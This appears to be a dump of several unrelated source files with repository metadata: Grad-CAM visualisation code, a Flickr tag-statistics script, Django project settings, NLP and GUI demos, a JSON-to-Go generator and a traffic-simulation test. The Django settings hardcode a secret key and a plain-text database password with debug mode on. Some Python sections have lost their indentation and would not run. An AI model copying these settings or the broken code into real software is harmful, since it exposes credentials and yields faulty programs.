np.ascontiguousarray(np.transpose(preprocessed_img, (2, 0, 1)))
preprocessed_img = torch.from_numpy(preprocessed_img)
preprocessed_img.unsqueeze_(0)
input = preprocessed_img.requires_grad_(True)
return input
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
cv2.imwrite("cam.jpg", np.uint8(255 * cam))
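    # The mask is rendered with a JET colormap and blended onto the 0-1 float
    # image; dividing by the max renormalizes the overlay for display.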
class GradCam:
def __init__(self, model, feature_module, target_layer_names, use_cuda):
self.model = model
self.feature_module = feature_module
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
self.extractor = ModelOutputs(self.model, self.feature_module, target_layer_names)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
features, output = self.extractor(input.cuda())
else:
features, output = self.extractor(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
self.feature_module.zero_grad()
self.model.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.extractor.get_gradients()[-1].cpu().data.numpy()
target = features[-1]
target = target.cpu().data.numpy()[0, :]
weights = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.zeros(target.shape[1:], dtype=np.float32)
for i, w in enumerate(weights):
cam += w * target[i, :, :]
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, input.shape[2:])
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
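        # The weights are the channel-wise global-average-pooled gradients
        # (the alpha_k of the Grad-CAM paper); the ReLU keeps only features
        # with a positive influence on the chosen class score.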
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input):
positive_mask = (input > 0).type_as(input)
output = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)
self.save_for_backward(input, output)
return output
@staticmethod
def backward(self, grad_output):
input, output = self.saved_tensors
grad_input = None
positive_mask_1 = (input > 0).type_as(grad_output)
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = torch.addcmul(torch.zeros(input.size()).type_as(input),
torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output,
positive_mask_1), positive_mask_2)
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model, use_cuda):
self.model = model
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
def recursive_relu_apply(module_top):
for idx, module in module_top._modules.items():
recursive_relu_apply(module)
if module.__class__.__name__ == 'ReLU':
module_top._modules[idx] = GuidedBackpropReLU.apply
# replace ReLU with GuidedBackpropReLU
recursive_relu_apply(self.model)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
output = self.forward(input.cuda())
else:
output = self.forward(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
# self.model.features.zero_grad()
# self.model.classifier.zero_grad()
one_hot.backward(retain_graph=True)
output = input.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--use-cuda', action='store_true', default=False,
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
args = parser.parse_args()
args.use_cuda = args.use_cuda and torch.cuda.is_available()
if args.use_cuda:
print("Using GPU for acceleration")
else:
print("Using CPU for computation")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img*255)
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for VGG19 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
# Can work with any model, but it assumes that the model has a
# feature method, and a classifier method,
# as in the VGG models in torchvision.
    model = models.resnet50(pretrained=True)
grad_cam = GradCam(model=model, feature_module=model.layer4, \
target_layer_names=["2"], use_cuda=args.use_cuda)
img = cv2.imread(args.image_path, 1)
img = np.float32(cv2.resize(img, (224, 224))) / 255
input = preprocess_image(img)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested index.
target_index = None
mask = grad_cam(input, target_index)
show_cam_on_image(img, mask)
gb_model = GuidedBackpropReLUModel(model=model, use_cuda=args.use_cuda)
print(model._modules.items())
gb = gb_model(input, index=target_index)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([mask, mask, mask])
cam_gb = deprocess_image(cam_mask*gb)
gb = deprocess_image(gb)
cv2.imwrite('gb.jpg', gb)
    cv2.imwrite('cam_gb.jpg', cam_gb)
# ======================================================================
# File: /pytools/vision/bin/flickr/flickr_stats.py  (repo: stefie10/slu_hri)
# ======================================================================
from sys import argv
from sorting import quicksort
from scipy import array
from pylab import *
import cPickle
#from wordnet import *
#from wntools import *
def filter_load(filename):
myfile = open(filename, 'r')
mylist = {}
for line in myfile:
mylist[line.strip().replace(' ', '')] = True
return mylist
def flickr_stats(filename, filter_filename=None):
prior = cPickle.load(open(filename, 'r'))
print "number of tags:", len(prior.keys())
myfilter = None
if(filter_filename != None):
myfilter = filter_load(filter_filename)
mytags_hash = {}
for obj in prior.keys():
location = prior[obj]
#for elt in myfilter:
try:
if(myfilter != None and myfilter[obj]):
mytags_hash[obj] = sum(location.values())
elif(myfilter == None):
mytags_hash[obj] = sum(location.values())
except:
continue
num_locations = len(prior.keys())
num_objects = len(mytags_hash.keys())
print "number of locations:", num_locations
print "number of objects:", num_objects
K = array(mytags_hash.keys())
Vs = array(mytags_hash.values())
V, I = quicksort(mytags_hash.values())
print "number of flowers:", mytags_hash["flower"]
#for i in range(len(mytags_hash.keys())):
# print mytags_hash.keys()[i], mytags_hash.values()[i]
#print "final key", K[I[len(V)-1]]
#print "final value", Vs[I[len(V)-1]]
print len(I), len(V)
mf_keys = K.take(I[len(I)-100:len(I)]).tolist()
mf_vals = array(Vs).take(I[len(I)-100:len(I)]).tolist()
mf_keys.reverse()
mf_vals.reverse()
p2 = bar(arange(len(mf_vals)), mf_vals, color='b', width=0.8)
setp(gca(), 'xticks', arange(len(mf_vals)))
labels = setp(gca(), 'xticklabels', mf_keys)
setp(labels, 'rotation', 'vertical')
print mf_keys
#labels = xticks(arange(len(mf_vals)), mf_keys)
#xticks(arange(len(mf_vals)), mf_keys)
show()
if __name__=="__main__":
if(len(argv)==2):
flickr_stats(argv[1])
if(len(argv)==3):
flickr_stats(argv[1], argv[2])
else:
print "usage:\n\t python flickr_stats.py prior.pck filter_filename"
| [
"[email protected]"
] | |
1f7c5f922cb681d1ea0aa518d8d9df8d7541f02c | 4bd43dee6668fe292f8061a290c56a4baba029f2 | /carzone/carzone/settings.py | 6963aafdafc30126aabf7f4949fa9488225207a7 | [] | no_license | 2anirban/carzone | 95ab9f1f5b8b8bda50774f9e0cee4f394b3c3f08 | aaacdce00c1187950800c0dd1eed04a440bcb520 | refs/heads/master | 2023-06-15T01:51:15.588197 | 2021-07-10T18:19:21 | 2021-07-10T18:19:21 | 378,468,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,521 | py | """
Django settings for carzone project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-u%sx#9*p3x-07s8kc6^h(m=psn2-*+fysg%o$et^+dit-q%*e0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pages',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'carzone.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'carzone.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'carzone_db',
'USER':'postgres',
'PASSWORD':'whatever20',
'HOST':'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT=os.path.join(BASE_DIR,"staticfiles")
STATICFILES_DIRS=[
os.path.join(BASE_DIR,'static'),
]
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
MEDIA_URL='/media/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
879a085d92a6ba1aa7ef32ce51ca1781ac30159c | 8996489f875657a4010c700139c8d59c7ad5a07c | /python/src/app.py | 672c8f0ac9130ead45a6ec22bf197e1f5e852d87 | [] | no_license | hodory/docker-package | d17277c6368689c83d745475c3f55549b899988a | b7d73fa7fe94613eda53a561192ee7ad5339a342 | refs/heads/master | 2020-12-21T12:15:48.310076 | 2020-02-06T08:02:33 | 2020-02-06T08:02:33 | 236,428,265 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | from konlpy.tag import Mecab, Kkma, Okt
from konlpy.utils import pprint
mecab = Mecab()
kkma = Kkma()
twitter = Okt()
string = '동해물과백두산이마르고닳도록'
print('# Mecab 형태소 분석')
pprint(mecab.morphs(string))
print('# 꼬꼬마 형태소 분석')
pprint(kkma.morphs(string))
print('# 트위터 형태소 분석')
pprint(twitter.morphs(string))
print('# 트위터 문구 추출')
pprint(twitter.phrases(string)) | [
"[email protected]"
] | |
694da9966a98ba7f6cfaaa11f69a9d335b534840 | f63e4c3e9d9c3877a0046b33d699400ac527a6f3 | /src/jsontogo/10oops.py | de3c59d6524100e4769f4a216d9590504eae2b3b | [] | no_license | podhmo/advent2016 | d96d33097fc509fe1eae5cf4869815962eff5dec | 40b8386db7df3041187933325d4caa755e297c71 | refs/heads/master | 2020-06-13T01:54:38.795497 | 2016-12-12T15:05:26 | 2016-12-12T15:05:26 | 75,465,938 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,289 | py | # -*- coding:utf-8 -*-
# see: https://mholt.github.io/json-to-go/
# original: https://github.com/mholt/json-to-go/blob/master/json-to-go.js
import re
import json
from collections import defaultdict
from collections import deque
from prestring import NameStore
from prestring import PreString
from prestring import LazyFormat
from prestring.go import GoModule
from prestring.go import goname as to_goname
def json_to_go(json_string, name, m=None, rx=re.compile("\.0", re.M)):
m = m or GoModule()
data = json.loads(rx.sub(".1", json_string))
s = detect_struct_info(data, name)
with m.import_group() as im:
pass
emit_code(s, name, m=m, im=im)
im.clear_ifempty()
return m
def resolve_type(val, time_rx=re.compile("\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d(\.\d+)?(\+\d\d:\d\d|Z)")):
if val is None:
return "interface{}"
if isinstance(val, bool):
return "bool"
elif isinstance(val, str):
if time_rx.match(val):
return "time.Time"
elif "://" in val:
return "github.com/go-openapi/strfmt.Uri"
else:
return "string"
elif isinstance(val, int):
if val > -2147483648 and val < 2147483647:
return "int"
else:
return "int64"
elif isinstance(val, float):
return "float64"
elif hasattr(val, "keys"):
return "struct"
elif isinstance(val, (list, tuple)):
return "slice"
else:
raise ValueError("unsupported for {!r}".format(val))
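# e.g. resolve_type(True) -> "bool", resolve_type(3.5) -> "float64",
# resolve_type("2016-12-12T10:00:00Z") -> "time.Time",
# resolve_type({"a": 1}) -> "struct", resolve_type([1, 2]) -> "slice"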
def select_better_type(*types):
s = {t for t in types if t is not None}
if "float64" in s:
return "float64"
elif "int64" in s:
return "int64"
else:
return s.pop()
def detect_struct_info(d, name):
def _detect_struct_info(d, s, name):
if hasattr(d, "keys"):
s["type"] = "struct"
s["jsonname"] = name
s["freq"] += 1
for k, v in d.items():
goname = to_goname(k)
_detect_struct_info(v, s["children"][goname], k)
elif isinstance(d, (list, tuple)):
s["type2"] = "slice"
for x in d:
_detect_struct_info(x, s, name) # xxx
else:
typ = resolve_type(d)
s["jsonname"] = name
s["freq"] += 1
s["type"] = select_better_type(s["type"], typ)
s["example"] = d
def make_struct_info():
return {"freq": 0, "type": None, "children": defaultdict(make_struct_info)}
s = defaultdict(make_struct_info)
goname = to_goname(name)
_detect_struct_info(d, s[goname], goname)
return s[goname]
def to_type_struct_info(sinfo):
if sinfo.get("type2") == "slice":
return "[]" + sinfo["type"]
else:
return sinfo["type"]
def is_omitempty_struct_info(subinfo, sinfo):
return subinfo["freq"] < sinfo["freq"]
def emit_code(sinfo, name, m, im, name_score_map={"parent": -1, '': -10}):
cw = CommentWriter(m, name, sinfo)
ns = NameStore()
defs = set()
typename_map = defaultdict(lambda: PreString(""))
def make_signature(sinfo):
return tuple([(k, v["type"], v.get("type2")) for k, v in sorted(sinfo["children"].items())])
def emit_structure_comment(sinfo, name, parent=None):
if sinfo.get("type") == "struct":
cw.write(name, sinfo, parent=parent)
for name, subinfo in sorted(sinfo["children"].items()):
emit_structure_comment(subinfo, name, parent=sinfo)
def _emit_struct(sinfo, name, parent=None):
m.comment(LazyFormat("{name} : auto generated JSON container", name=name))
with m.type_(name, to_type_struct_info(sinfo)):
for name, subinfo in sorted(sinfo["children"].items()):
_emit_code(subinfo, name, m, parent=sinfo)
def _emit_code(sinfo, name, m, parent=None):
if "." in sinfo.get("type"):
im.import_(sinfo.get("type").rsplit(".", 1)[0])
if sinfo.get("type") == "struct":
signature = make_signature(sinfo)
cont.append((name, sinfo, signature))
typ = typename_map[signature]
typ.body.append(name)
else:
typ = to_type_struct_info(sinfo)
if "/" in typ:
typ = typ.rsplit("/", 1)[-1]
m.stmt(LazyFormat('{} {}', name, typ))
# append tag
omitempty = ",omitempty" if is_omitempty_struct_info(sinfo, parent) else ""
example = ' example:"{}"'.format(sinfo["example"]) if "example" in sinfo else ""
m.insert_after(' `json:"{}{omitempty}"{example}`'.format(sinfo["jsonname"], omitempty=omitempty, example=example))
emit_structure_comment(sinfo, name, parent=None)
cont = deque([(name, sinfo, make_signature(sinfo))])
while cont:
name, sinfo, signature = cont.popleft()
if signature in defs:
continue
defs.add(signature)
typename_map[signature].body.append(name)
_emit_struct(sinfo, typename_map[signature])
for signature, lazy_typename in typename_map.items():
candidates = set(lazy_typename.body)
new_name = max(candidates, key=lambda k: name_score_map.get(k.lower(), 0))
ns[signature] = new_name
lazy_typename.body.clear()
lazy_typename.body.append(ns[signature])
return m
class CommentWriter(object):
def __init__(self, m, name, sinfo):
m.stmt("/* structure")
cm = GoModule()
m.stmt(cm)
cm.stmt(name)
self.cm_map = {sinfo["jsonname"]: cm}
m.stmt("*/")
def write(self, name, sinfo, parent=None):
if parent is None:
return
cm = self.cm_map[parent["jsonname"]]
with cm.scope():
cm.stmt(name)
self.cm_map[sinfo["jsonname"]] = cm.submodule(newline=False)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--package", type=str, default="autogen")
parser.add_argument("--name", type=str, default="AutoGenerated")
parser.add_argument("src", type=argparse.FileType('r'))
args = parser.parse_args()
m = GoModule()
m.package(args.package)
print(json_to_go(args.src.read(), args.name, m))
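# Example invocation (added; the JSON file name is illustrative):
#   python 10oops.py --package models --name Person person.json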
| [
"[email protected]"
] | |
e377b090ff7120577d1010807e18b1466e5ce87a | 3471d4aa328eddcef54f0236d2166ebbafc053e5 | /img_classify/Ui_ClassifyForm.py | 3048781d5cd138f0f39c94a845fb21ec15872ee0 | [] | no_license | gjz22cn/tf | 4b434535440eac0987f924050f2b1ee45005c842 | 725119d2a96812325aada7d58f86ae9a78a81452 | refs/heads/master | 2020-05-01T04:41:51.129308 | 2019-12-02T13:06:48 | 2019-12-02T13:06:48 | 177,281,567 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,664 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Ui_ClassifyForm.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ClassifyForm(object):
def setupUi(self, ClassifyForm):
ClassifyForm.setObjectName("ClassifyForm")
ClassifyForm.resize(450, 270)
self.classifyBtn = QtWidgets.QPushButton(ClassifyForm)
self.classifyBtn.setGeometry(QtCore.QRect(330, 40, 90, 30))
self.classifyBtn.setObjectName("classifyBtn")
'''
self.zhileiBtn = QtWidgets.QPushButton(ClassifyForm)
self.zhileiBtn.setGeometry(QtCore.QRect(330, 80, 90, 30))
self.zhileiBtn.setObjectName("zhileiBtn")
self.boliBtn = QtWidgets.QPushButton(ClassifyForm)
self.boliBtn.setGeometry(QtCore.QRect(330, 120, 90, 30))
self.boliBtn.setObjectName("boliBtn")
self.suliaoBtn = QtWidgets.QPushButton(ClassifyForm)
self.suliaoBtn.setGeometry(QtCore.QRect(330, 160, 90, 30))
self.suliaoBtn.setObjectName("suliaoBtn")
'''
self.exitBtn = QtWidgets.QPushButton(ClassifyForm)
self.exitBtn.setGeometry(QtCore.QRect(330, 150, 90, 30))
self.exitBtn.setObjectName("exitBtn")
self.imageLabel = QtWidgets.QLabel(ClassifyForm)
self.imageLabel.setGeometry(QtCore.QRect(40, 10, 240, 240))
self.imageLabel.setText("")
self.imageLabel.setObjectName("imageLabel")
self.resultLabel = QtWidgets.QLabel(ClassifyForm)
self.resultLabel.setGeometry(QtCore.QRect(330, 80, 90, 20))
self.resultLabel.setObjectName("resultLabel")
self.closeBtn = QtWidgets.QPushButton(ClassifyForm)
self.closeBtn.setGeometry(QtCore.QRect(330, 190, 90, 30))
self.closeBtn.setObjectName("closeBtn")
self.retranslateUi(ClassifyForm)
QtCore.QMetaObject.connectSlotsByName(ClassifyForm)
def retranslateUi(self, ClassifyForm):
_translate = QtCore.QCoreApplication.translate
        ClassifyForm.setWindowTitle(_translate("ClassifyForm", "分类"))  # "Classification"
        self.classifyBtn.setText(_translate("ClassifyForm", "识 别"))  # "Recognize"
        '''
        self.zhileiBtn.setText(_translate("ClassifyForm", "纸 类"))  # "Paper"
        self.boliBtn.setText(_translate("ClassifyForm", "玻 璃"))  # "Glass"
        self.suliaoBtn.setText(_translate("ClassifyForm", "塑 料"))  # "Plastic"
        '''
        self.exitBtn.setText(_translate("ClassifyForm", "退 出"))  # "Exit"
        self.resultLabel.setText(_translate("ClassifyForm", "TextLabel"))
        self.closeBtn.setText(_translate("ClassifyForm", "关 机"))  # "Shut down"
| [
"[email protected]"
] | |
79cfe271cd082d64ec52a9e1d940fff9ff994924 | 22c6405b1ac254dd6cefa196d793940013d63cf6 | /Jayraj-Patel-Model/Lat-Longs/Miniso Analysis/Minso Distance Code.py | 9554ce0ed4277d00c597e96469c3062b48d2ccc9 | [] | no_license | aripirala/Predictive-Model---Claires | bf125c6eacdd4d2477e9641973608004ae0b8ae8 | c91c877e9f7d11e81cf680ca1b489dd3a63826c6 | refs/heads/master | 2018-10-17T11:17:36.964490 | 2018-08-01T14:40:40 | 2018-08-01T14:40:40 | 115,640,960 | 1 | 1 | null | 2018-01-26T15:47:33 | 2017-12-28T16:29:25 | Python | UTF-8 | Python | false | false | 2,303 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 20 11:51:50 2018
@author: patelj
"""
from math import sin, cos, sqrt, atan2, radians
import pandas as pd
import numpy as np
import xlsxwriter
FILE_PATH_INPUT = 'C:/Users/patelj/Documents/Lat-Longs/'
FILE_PATH_OUTPUT = 'C:/Users/patelj/Documents/Lat-Longs/Miniso Analysis/'
R = 6373.0  # approximate Earth radius in kilometres
miniso_df = pd.read_excel(FILE_PATH_INPUT+'Miniso-Lat-Long.xlsx', sheetname='Data')
claires_df = pd.read_excel(FILE_PATH_INPUT+'NA-Lat-Longs.xlsm', sheetname='Data')
###-------Test Code for one set of coordinates-------###
#lat1 = claires_df["Latitude"].values[1274]
#lon1 = claires_df["Longitude"].values[1274]
#lat2 = miniso_df["Latitude"].values[11]
#lon2 = miniso_df["Longitude"].values[11]
#lat1 = radians(lat1)
#lon1 = radians(lon1)
#lat2 = radians(lat2)
#lon2 = radians(lon2)
#dlon = lon2 - lon1
#dlat = lat2 - lat1
#a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2
#c = 2 * atan2(sqrt(a), sqrt(1 - a))
#distance = R * c
#print("Result:", distance)
###-------End Test Code-------###
dist_list = []
#dist_output_df = pd.DataFrame(index=claires_df.index)
for x in range(0,1276):  # one row per Claire's store in the input spreadsheet
lat1 = claires_df["Latitude"].values[x]
lon1 = claires_df["Longitude"].values[x]
lat1 = radians(lat1)
lon1 = radians(lon1)
    for i in range(0,13):  # one column per Miniso location in the input spreadsheet
lat2 = miniso_df["Latitude"].values[i]
lon2 = miniso_df["Longitude"].values[i]
lat2 = radians(lat2)
lon2 = radians(lon2)
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2
c = 2 * atan2(sqrt(a), sqrt(1 - a))
distance = R * c
miles_dist = distance * 0.621371
#print("Result:", miles_dist)
dist_list.append(miles_dist)
new_list = np.array(dist_list)
new_list = new_list.reshape(1276,13)
dist_output_df = pd.DataFrame(new_list)
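# Hedged alternative (added): the pairwise haversine distances above can be
# computed in one shot with numpy broadcasting; column names match the
# spreadsheets already loaded in this script.
#
#   lat1 = np.radians(claires_df["Latitude"].values)[:, None]
#   lon1 = np.radians(claires_df["Longitude"].values)[:, None]
#   lat2 = np.radians(miniso_df["Latitude"].values)[None, :]
#   lon2 = np.radians(miniso_df["Longitude"].values)[None, :]
#   a = np.sin((lat2 - lat1) / 2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin((lon2 - lon1) / 2)**2
#   miles = R * 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a)) * 0.621371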
#dist_output_df.to_excel(FILE_PATH_OUTPUT+'Miniso Distance Output.xlsx')
#print((new_list<1))
one_list = []
one_list_df = pd.DataFrame()  # start empty: one_list has no rows yet, so a fixed empty index would break the column assignments below
for m in range(0, 1276):
min_list = (new_list[m,:]<1).sum()
one_list.append(min_list)
one_list_df["Store Number"] = claires_df["Store ID"]
one_list_df["Miniso"] = one_list
#one_list_df.to_excel(FILE_PATH_OUTPUT+"Min List.xlsx")
| [
"[email protected]"
] | |
12c65b4950d31c0a8501917e0f33acb0a872566d | 7561171f1bca9726b69bb7e58cb772f100dcefa8 | /polls/migrations/0001_initial.py | 1971ef4874190a26cc0f7c1421661703d08f7a16 | [] | no_license | csportat/CMPUT404_lab4_django | 2a1a003dc98e55a0223bc0be9375213b4f5f9590 | a0eab270b540a716a49831a3083325f7aa08b7d1 | refs/heads/main | 2023-09-01T11:57:34.708717 | 2021-10-01T17:14:15 | 2021-10-01T17:14:15 | 412,449,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | # Generated by Django 3.2.7 on 2021-10-01 13:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.CreateModel(
name='Choice',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.question')),
],
),
]
| [
"[email protected]"
] | |
d13fe00841df091809061e6469f8a6d1e06cb02e | c64a98cd5c130e8aa48605b415d8b97fc0585510 | /3.16.5.py | cf867e2dad357d1241dc20c6ae62731649db4c5f | [] | no_license | bentd/think-python | bbd57b224a5caf7fcf3dc9590b247b7c1ac79da7 | b3a940f08df32e1c7f36a65717caf44aabd3eadc | refs/heads/master | 2020-07-18T08:05:14.321020 | 2019-09-04T02:13:36 | 2019-09-04T02:13:36 | 206,210,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | def do_quad(i, f):
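    # draws a 2x2 grid: i() prints a horizontal border row, f() prints a vertical spacer row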
i()
f()
f()
f()
f()
i()
f()
f()
f()
f()
i()
def print_line():
    a = '+'
    s = 4 * '-'
    print(a, s, a, s, a)
def print_space():
    l = '|'
    p = 4 * ' '
    print(l, p, l, p, l)
def run():
do_quad(print_line, print_space)
run()
| [
"[email protected]"
] | |
1a0ed5e4774201cd84513577f14e0c0f13e859bb | e88236a85d5b77f29b099cc72e2c87e8372eb7b1 | /Mad Lib.py | 21b10b456f4ad682ed1ad3401c0ec4d299cf6a77 | [] | no_license | BatistaAlexandre/Pyton_Projects | 8deabe8c3490280490a4297e0f5b100bff3a1cf7 | 9417bc5d82ee8b1bb5073e176b9f2fd17c2066ec | refs/heads/main | 2023-08-20T08:02:26.590472 | 2021-10-31T03:22:11 | 2021-10-31T03:22:11 | 417,197,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | print("")
print("This is my frist Mad Libs project.")
print("")
name = ("Thomas")
adj1 = ("fighter")
adj2 = ("glutton")
activity1 = ("surgeries")
activity2 = ("washer")
activity3 = ("healing")
noun1 = ("farmer")
noun2 = ("chair")
noun4 = ("cars")
place1 = ("Alaska")
place2 = ("São Paulo")
print(name, " is a ", adj1, noun1, " who lives in ", place1, " and is from a ", adj2, " family. He lives with his ", noun2, " who is the breadwinner of the family. She earns ", noun4, " by ", activity1, " at Walmart. When ", name, "'s ", noun2, " has free time they ", activity2, " together and have fun ", activity3, "in", place2, ".")
print("")
print("What a beautiful story!")
| [
"[email protected]"
] | |
07f54fa8d55b5c899267c947394d094fc5b649a3 | ac5af893590d3f59663d040f50818989f5373c86 | /tests/test_experiment_base_class.py | 60fdaf57e09405899876fc987ff10247423027f0 | [
"MIT"
] | permissive | mark-koren/flow | a22891dfd8a3299e5ecdb8adb33aefb5a93fdba9 | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | refs/heads/master | 2020-03-19T00:52:09.005880 | 2018-05-30T23:29:21 | 2018-05-30T23:29:21 | 135,506,693 | 0 | 0 | MIT | 2018-05-30T23:14:18 | 2018-05-30T23:14:17 | null | UTF-8 | Python | false | false | 2,080 | py | import unittest
import logging
from flow.core.experiment import SumoExperiment
from flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams
from flow.core.vehicles import Vehicles
from flow.controllers.routing_controllers import ContinuousRouter
from flow.controllers.car_following_models import *
from flow.controllers.rlcontroller import RLController
from flow.envs.loop_accel import SimpleAccelerationEnvironment
from flow.scenarios.loop.gen import CircleGenerator
from flow.scenarios.loop.loop_scenario import LoopScenario
from setup_scripts import ring_road_exp_setup
class TestNumSteps(unittest.TestCase):
"""
Tests that experiment class runs for the number of steps requested.
"""
def setUp(self):
# create the environment and scenario classes for a ring road
env, scenario = ring_road_exp_setup()
# instantiate an experiment class
self.exp = SumoExperiment(env, scenario)
def tearDown(self):
# free up used memory
self.exp = None
def runTest(self):
self.exp.run(num_runs=1, num_steps=10)
self.assertEqual(self.exp.env.timer, 10)
class TestNumRuns(unittest.TestCase):
"""
Tests that the experiment class properly resets as many times as requested,
after the correct number of iterations.
"""
def runTest(self):
        # run the experiment for 1 run and collect the final speeds of all
        # vehicles (the variables are named pos* but hold speeds)
env, scenario = ring_road_exp_setup()
exp = SumoExperiment(env, scenario)
exp.run(num_runs=1, num_steps=10)
pos1 = [exp.env.vehicles.get_speed()]
        # run the experiment for 2 runs and collect the final speeds of all
        # vehicles
